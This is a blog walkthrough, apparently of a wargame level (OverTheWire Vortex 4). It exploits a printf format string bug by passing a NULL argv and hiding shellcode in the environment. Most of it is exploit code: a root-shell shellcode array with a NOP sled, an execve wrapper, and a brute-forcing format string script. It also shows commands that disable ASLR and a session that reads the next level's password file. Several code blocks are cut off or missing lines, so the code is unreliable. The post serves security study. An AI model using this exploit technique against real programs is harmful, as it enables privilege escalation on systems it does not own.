
Tuesday, September 18, 2012

OverTheWire Vortex Level 4

This level looks like a simple 3 lines program. It's a common format string vulnerability (great references on how to exploit in [1], [3] and [5]):
int main(int argc, char **argv)
 if(argc) exit(0);
1. First there's a check to bypass: the program exits if the argc variable is different than 0 (if(argc) exit(0);). argc variable represents the length of argv array, which has on the first position the program name (the name appearing on top and like utilities, for example). So argc is always >=1.
If we know how arguments (and environment variables) are passed to the main function when executing the binary,  we can bypass the verification and also pass something meaningful to printf in argv[3] argument.  The stack looks like this:
| argc | argv[0] | argv[1] ... |argv[argc-1]| NULL |env[0]|...|env[n]|NULL|
Where the first NULL indicates the end of the argv array, and the second one the end of the environment variables array. So if we pass NULL as the argv array, when the program tries to access argv[3], it will in fact access env[2], because the stack would look like this (argv[0] points to the NULL byte):
| 0 | NULL | env[0] | env[1] | env[2] | ...
In Python I couldn't call one of the exec functions with argv set to NULL, so I've used the classic method:
char exe[] = "/vortex/vortex4";

char* argv[] = { NULL }; 
char* env[] = {"env0", "env1", "TEST", NULL};

execve(exe, argv, env);
2.  Now we know we have to pass the format string attack into an environment variable. We have to find out the approximate location of the environment variables in the memory. The vortex labs machine has ASLR disabled. We can test with and without ASLR to see the variation of the environment variables' address, using the following simple program:
 * Test program to find the location of envirnment variables on stack.
 *  - test with/without ASLR
 * To disable ASLR: 
 * echo 0 > /proc/sys/kernel/randomize_va_space
 * To enable ASLR:
 * echo 2 > /proc/sys/kernel/randomize_va_space

#include <stdio .h>

extern char **environ;

/* Return the current stack pointer */
unsigned long find_esp(void){
 // Copy stack pointer into EAX
    __asm__("mov %esp, %eax");
    // Return value of the function is in EAX

int  main() {
 char **env = NULL;
    for (env = environ; *env; ++env)
        printf("%p:\t%s\n", env, *env);

    unsigned long p = find_esp(); 
    printf ("Current stack pointer: Ox%lx\n" , p) ;
    return 0;

3. We decide an address to overwrite to change the flow of the program. We can use the same trick as in the previous level: replace the address of exit() function in .plt (which is called at the end of the program), which we find by searching relocations sections in the binary:
vortex4@melissa:/vortex$ readelf -r ./vortex4
Relocation section '.rel.plt' at offset 0x294 contains 4 entries:
 Offset     Info    Type            Sym.Value  Sym. Name
0804a000  00000107 R_386_JUMP_SLOT   00000000   __gmon_start__
0804a004  00000207 R_386_JUMP_SLOT   00000000   __libc_start_main
0804a008  00000307 R_386_JUMP_SLOT   00000000   printf
0804a00c  00000407 R_386_JUMP_SLOT   00000000   exit
4. Plan: place a shellcode (I've used the same 32 bytes I've used in the previous level, setuid+execve) in  the environment variable, with a big NOP sled before (I've used 500 bytes). In the format string before, try to overwrite the address we found above, 0x0804a00c (which I've actually replaced in 4 bytes: 0x0804a00c, 0x0804a00d, 0x0804a00e, 0x0804a00f. A method to overwrite it with only 2 replaces instead of 4 is described in the referred documentation).
This was actually the harder part. I've made a python wrapper over the C wrapper containing execve instruction, that passes (and finally brute-forces) different format strings.
A good exercise is first to try to read memory (using %x or %s instead of %n for writing), to find the actual position of the format string on the stack. This will actually be quite different than the examples from [1]. I actually found that I needed 106 bytes to get to the format string on the stack.
A trick that can be used here: direct parameter access in printf ($), detailed in the Single Unix Specification ([4]). For me, I could access the format string with the following parameter:
fmt = "AAAABBBBCCCCDDDD..." + "%106$x%107$x%108$x%109$x"
I've adjusted it with fillers ('.'), and tuned the offset untl reach the correct one, 106.
The python script mentioned:
import subprocess

Script to pass the format string and address to be overwritten to
the vortex 4 wrapper binary

# 4 bytes to be modified (address of exit() in .plt - 0x0804a00c)
addr =  "\x0c\xa0\x04\x08" + \
        "\x0d\xa0\x04\x08" + \
        "\x0e\xa0\x04\x08" + \

# Read it, after many trial and errors
#fmt = "AAAABBBBCCCCDDDD..." + "%106$x%107$x%108$x%109$x"

for i in range(1, 255):
        for j in range(1, 255):
                fmt = addr + "...." + \
                "%106$n%5$0" + str(i) + "d" + \
                "%107$n%5$0" + str(j) + "d" + \
                "%108$n" + \
                print "%d %d fmt: %s: " % (i, j, fmt)
                p = subprocess.Popen(['/tmp/myl4', fmt])
                # Ctrl-D to continue

5. And the C wrapper with execve over vortex4 binary:
 * Wrapper over vortex 4 binary: 
 *  - byapss first argc check
 *  - pass shellcode in environment variable
 *  - receive format string from python wrapper (.. easier) 

#include <stdio .h>
#include <string .h>

/* 32 bytes setuid(0) + execve("/bin/sh",["/bin/sh",NULL]); */
char shellcode[] = "\x6a\x17\x58\x31\xdb\xcd\x80\x31\xd2\x6a\x0b\x58\x52" 

char padding[500];
char NOP = '\x90';
int nops = 500;

int main(int argc, char **args) {
 char exe[] = "/vortex/vortex4";
 char sh[600] = {0};
 // Fill with lots of NOPs to make sure we reach the shellcode
 memset(padding, NOP, nops);
 memcpy(sh, padding, nops);
 memcpy(sh+nops, shellcode, strlen(shellcode));
 // argc wil be 0, because argv[0] is not set
 char* argv[] = { NULL }; 
 char* env[] = {"env0", "env1", args[1], sh, NULL};

 execve(exe, argv, env);
 return 0;
6. Putting all together we get the pass:
vortex4@melissa:/tmp$ vim myl4.c
vortex4@melissa:/tmp$ vim
vortex4@melissa:/tmp$ gcc -o myl4 myl4.c
vortex4@melissa:/tmp$ python
202 33 fmt: 
$ id
uid=5004(vortex4) gid=5004(vortex4) euid=5005(vortex5) groups=5005(vortex5),5004(vortex4)
$ cat /etc/vortex_pass/vortex5
  1. Exploiting Format String Vulnerabilities - version 1.2 (team teso)
  2. Another solution and explanation
  3. Great detailed explanation of format string vulnerabilities, stackoverflow
  4. Format strings in printf - Single UNIX Specification
  5. Advances in format string exploitation
  6. My solution files

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